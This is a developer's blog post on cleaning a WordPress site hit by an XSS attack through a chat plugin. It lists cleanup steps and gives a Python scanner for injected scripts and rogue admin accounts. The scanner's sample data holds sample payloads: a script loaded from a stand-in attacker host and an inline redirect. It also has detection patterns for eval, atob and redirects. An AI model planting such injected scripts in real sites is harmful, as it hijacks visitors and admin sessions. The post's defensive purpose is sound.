Fixed My First XSS Attack

Yesterday, one of my clients had his website hacked and it was showing adware, which was quite harmful to his business and his website.

After a thorough investigation, I found it was an XSS attack that injected JavaScript into his website to redirect visitors to the ads. But the dangerous part was what happened when you logged in as an admin: the script hijacked the nonce credentials and created an admin user, which was very, very dangerous.

The disturbing part is that it was due to a very famous WordPress plugin called “WP Live Chat Support” that didn’t implement security in a responsible way. If you are using it, please deactivate it immediately until it is fixed (although it has been banned by now).

If you are looking for more info about what XSS is, you can watch this video: https://www.youtube.com/watch?v=L5l9lSnNMxg

Some steps for developers:

  • Deactivate the “WP Live Chat Support” plugin.
  • Go to the wp_options table and delete the “WPLC_CUSTOM_JS” row; that is where the injected script was stored, and the site keeps serving it as long as the row exists.
  • Check the users list for administrator accounts you did not create, remove them, and reset the passwords of the remaining admins, since the attacker had an admin session.
  • Make sure you don’t have any suspicious JavaScript code loading from an unknown third-party host anywhere in the site (options, widgets, posts, theme files).
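As an added example (not code from this post or from the plugin), here is a small Python check for the last two steps: it scans wp_options rows for script tags loading from hosts other than the site's own, flags inline scripts that look like redirects, and lists administrator accounts that are not on an expected list. The rows are a constructed sample standing in for `SELECT option_name, option_value FROM wp_options` and the `wp_capabilities` usermeta values; the trusted host list, the regexes and the option names other than WPLC_CUSTOM_JS are assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: the site's own hostnames; a script loaded from any other host is flagged.
TRUSTED_HOSTS = {"example.com", "www.example.com"}

# Constructed sample of wp_options rows (option_name, option_value), standing in for
#   SELECT option_name, option_value FROM wp_options;
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.com"),
    ("WPLC_CUSTOM_JS", '<script src="//ads.attacker.invalid/loader.js"></script>'),
    ("widget_text", '<script>window.location.href="https://ads.attacker.invalid/";</script>'),
    ("theme_mods_twentynineteen", '<script src="https://www.example.com/assets/app.js"></script>'),
]

# Constructed sample: (user_login, wp_capabilities usermeta value), i.e. wp_users joined
# with wp_usermeta. The value is WordPress's serialized PHP capability array.
SAMPLE_USERS = [
    ("owner", 'a:1:{s:13:"administrator";b:1;}'),
    ("editor1", 'a:1:{s:6:"editor";b:1;}'),
    ("wpadmin_support", 'a:1:{s:13:"administrator";b:1;}'),
]

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)
# Behaviour typical of ad-redirect payloads (assumed heuristic; extend as needed).
REDIRECT_RE = re.compile(r'location\.(?:href|replace|assign)|window\.open\(|eval\(|atob\(', re.I)


def script_host(src):
    """Hostname a script src loads from, or None for same-origin relative paths."""
    if src.startswith("//"):
        src = "https:" + src  # protocol-relative URL, common in injected loaders
    return urlparse(src).hostname


def find_suspicious_scripts(rows, trusted_hosts):
    """Return (option_name, kind, detail) tuples: 'external' for a script src whose
    host is not trusted, 'inline' for a script body that looks like a redirect."""
    findings = []
    for name, value in rows:
        for src in SCRIPT_SRC_RE.findall(value):
            host = script_host(src)
            if host and host.lower() not in trusted_hosts:
                findings.append((name, "external", host))
        for body in INLINE_SCRIPT_RE.findall(value):
            if REDIRECT_RE.search(body):
                findings.append((name, "inline", body.strip()[:80]))
    return findings


def unexpected_admins(users, expected_logins):
    """Logins holding the administrator capability that are not on the expected list."""
    return sorted(
        login for login, caps in users
        if '"administrator"' in caps and login not in expected_logins
    )


if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_OPTIONS, TRUSTED_HOSTS):
        print("suspicious script:", *finding)
    for login in unexpected_admins(SAMPLE_USERS, {"owner"}):
        print("unexpected administrator:", login)
```

Run against a real dump, the same scan is worth repeating over wp_posts (post_content) and the theme's header/footer files, since an attacker who already had an admin session could have stored the loader in more than one place.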